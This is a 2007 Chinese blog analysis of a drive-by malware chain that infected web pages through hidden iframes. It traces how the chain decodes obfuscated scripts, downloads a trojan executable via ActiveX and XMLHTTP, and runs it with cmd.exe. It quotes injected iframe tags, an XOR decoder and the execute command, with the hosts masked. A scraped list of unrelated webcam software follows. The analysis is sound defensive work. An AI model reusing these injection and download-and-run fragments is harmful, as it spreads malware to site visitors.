endurer 原创
2007-06-11 第1版
今天在使用Web邮箱时,Kaspersky报告:
/---
已检测到: 恶意程序 Exploit.HTML.Ascii.o URL: hxxp://mm***.98*7**99***9.com/mm/a.htm
---/
Google搜索了一下,发现此代码是一种ARP病毒添加的。
检查发现网页都被加入了代码:
/---
<iframe SRC="hxxp://mm***.98*7**99***9.com/abc.htm" width="1" height="1" frameborder="0">
</iframe>
---/
hxxp://mm***.98*7**99***9.com/abc.htm 的标题为:mobile phone,内容为Service Unavailable,有迷惑性。
包含代码:
/---
<iframe src=hxxp://mm***.98*7**99***9.com/mm/a.htm width=100 height=0></iframe>
---/
hxxp://mm***.98*7**99***9.com/mm/a.htm 标题为:LOVE!,包含两段恶意代码。
其一是采用US-ASCII编码的字符串。
其二是代码:
/---
<Script language="Javascript" src="hxxp://mm***.98*7**99***9.com/mm/b.js"></Script>
---/
到 http://purpleendurer.ys168.com 下载US-ASCII编码解码程序解密后,得到一段网页代码,标题为:super IE 0Day,内容分为三个部分。
其一是javascript脚本代码,包含两个自定义函数MakeItSo()和detectOS(),MakeItSo()使用detectOS()检测浏览者电脑的Windows版本,如果是 Windows XP或Windows 2003,就打开logo.htm,否则打开banner.htm。
其二是VBScript脚本代码,功能是是创建对象 Microsoft.XMLHTTP,如果不成功就输出JavaScript脚本代码:
/---
<SCRIPT LANGUAGE="javascript">window.setTimeout(""MakeItSo()"",5000);</script>
---/
否则输出代码:
/---
<iframe width="0" height="0" src="apple.htm"></iframe>")
---/
其三是javascript脚本代码,功能是检测cookiewoshi0day是否存在,若不存在则创建,并输出代码:
/---
<iframe width=0 height=0 src=help.htm></iframe>
---/
hxxp://mm***.98*7**99***9.com/mm/b.js内容未加密,功能是利用ThunderServer.webThunder.1下载hxxp://www.98*7**99***9.com/web.exe,保存到c:/并运行。
文件说明符 : D:/数码相片/web.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-6-11 13:18:44
修改时间 : 2007-6-11 13:19:39
访问时间 : 2007-6-11 13:19:52
大小 : 18432 字节 18.0 KB
MD5 : 1c22de0a5753d9e2e9a88d65393d0a9b
Kaspersky的反应
已检测到: 木马程序 Trojan-Downloader.Win32.Delf.bjy 文件: D:/test/web.exe/PE_Patch.UPX/UPX
瑞星报为:Worm.Delf.yqz
hxxp://mm***.98*7**99***9.com/mm/logo.htm 标题为:KISS!,,包含两段恶意代码。
其一是采用US-ASCII编码的字符串。
其二是代码:
/---
<IFRAME SRC=hxxp://mm***.98*7**99***9.com/mm/test.htm width=1 height=1 frameborder=0></IFRAME>
---/
US-ASCII编码的字符串解码后为HTML代码,标题为:ieplorer,其中包含:
/---
<link rel="stylesheet" href="GnYiVsAQ.CSS">
---/
GnYiVsAQ.CSS 的内容为:
/---
<STYLE type=text/css>
<!--
body {CURSOR: url('hxxp://www.98*7**99***9.com/YuiAnLQvZx.jpg')}
--></STYLE>
---/
YuiAnLQvZx.jpg 似乎已不存在,估计是利用ANI漏洞下载文件。
hxxp://mm***.98*7**99***9.com/mm/test.htm 利用了雅虎通Webcam Viewer ActiveX控件远程栈溢出漏洞,远程攻击者可能利用此漏洞控制用户机器。
雅虎通的Webcam Viewer(ywcvwr.dll)ActiveX控件没有正确地验证对Server属性的输入。如果用户受骗访问了恶意站点向该属性传送了超长字符串然后又调用了Receive()方式的话,就可能触发栈溢出,导致执行任意指令。
参考:hxxp://mcafeefans.com/article.asp?id=1311
hxxp://mm***.98*7**99***9.com/mm/banner.htm 标题为:Bypassing of web filters by using ASCII Exploit By CoolDiyer,内容为与hxxp://mm***.98*7**99***9.com/mm/logo.htm相的US-ASCII编码的字符串。
hxxp://mm***.98*7**99***9.com/mm/apple.htm 内容为 javascript 脚本代码,功能是使用eval()执行使用自定义函数
/---
var S=function(m){return String.fromCharCode(m^109)};
---/
解密的代码。
解密后的内容为javascript 脚本代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件hxxp://www.98*7**99***9.com/web.exe,保存到%windir%,文件名由自定义函数:
/---
function fk(n){var number = Math.random()*n;return Math.round(number)+'.exe';
}
---/
生成,即***.exe,其中*为数字,再移到目录%windir%/rising***中,然后Shell.Application 对象 Q 的 ShellExecute 方法 执行命令:
%windir%/system32/cmd.exe /c %windir%/rising***/***.exe,"","open",0
hxxp://mm***.98*7**99***9.com/mm/help.htm标题为:Bypassing of web filters by using ASCII Exploit By CoolDiyer,内容为US-ASCII编码的字符串。
解码后的内容为HTML代码,标题为Bypassing of web filters by using ASCII Exploit By CoolDiyer及super IE 0Day,内容为JavaScript代码,功能是利用了IE Internet.HHCtrl ActiveX对象的拒绝服务漏洞。
受影响系统:
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Internet Explorer在未初始化URL时调用Internet.HHCtrl.1 ActiveX对象的Click()方法触发空指针引用问题,可能导致IE崩溃。
参考:
IE Internet.HHCtrl ActiveX对象中拒绝服务漏洞
http://it.rising.com.cn/Channels/Safety/LatestHole/Hole_Windows/2006-07-25/1153791365d36644.shtml
分享到:
相关推荐
jquery插件jquery.webcam 实现拍照功能
app来源小米应用商店 http://app.mi.com/details?id=com.shenyaocn.android.WebCam 进入这个网页有详细的应用介绍 这个网页 https://blog.csdn.net/xiaoqiang_007_/article/details/106578900 有使用示例
jQuery Webcam这个插件为直接在JavaScript中与摄像头通信提供了一个透明...它通一个SW文件与摄像头交互,可以显示Webcam输出和捕捉图象。如果有多个摄像头,它可以显示可用的摄像头列表,然后供用户选择其中任意一个。
Webcam Surveyor是一款专业好用的视频捕捉工具软件。软件支持MJpeg、DivX、Mpeg-4和MP3、WMA等影像和声音编码,可实现一秒到59个小时任意时间的视频捕捉,一举一动毫无保留的保存下来。如果对这方面有需求的可以下载...
webcam-capture-0.3.12.jar,调用摄像头使用 -
Iriun 4K Webcam_v2.3.5安卓版.apk.1
解压后进入jquery-webcam-master文件夹,双击test.html文件即可运行。使用的是jQuery的webcam。在自己的项目中加入jquery.webcam.js和jquery.webcam.min.js即可
使用jQuery-webcam摄像头拍照demo,实现了在web页面调用摄像头的开发
webcam-capture jar文件打包带走。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
亲测有效的电脑打开操作手机摄像头的软件,支持win10,
java webcam 调用摄像头亲测可用用,里面有demo,直接就可以调用摄像头,里面又example直接运行就可以调用摄像头
Webcam原理介绍
使用webcam调用 摄像头采集照片,支持各种主流浏览器 (谷歌浏览器 、ie 11、360浏览器等)
jQuery webcam plugin是一个在ie,firefox,chrome下都可以用的摄像头摄像及拍照用的插件。在官方下载的源代码中提供的jscam.js生成的图片是320x240的图,用高清摄橡头时发挥不了它的价值,在一些业务需求下,如用...
iriun-webcam-v2.7.apk
jQuery-webcam分辨率640*480。jQuery webcam plugin是一个兼容各浏览器的摄像头插件,资源根据官网(http://www.xarg.org/project/jquery-webcam-plugin/)下载的源码和网上的Demo做了部分修改,主要解决以下问题:1...
兼容多浏览器,IE8,9,10,11,edge,chrome,ff等 兼容flash,html5,需要安装adobe flash player
webcame-capture.jar工具包
webcam主要用于手机-电脑摄像头,当然对于拥有摄像头的来说是不必要的。
unity摄像头NatCam Pro - WebCam API 1.6f1 NatCam Pro builds upon NatCam Core by adding major technical features: - Blazing fast camera preview on Android and iOS. - HD. You can view what your phone ...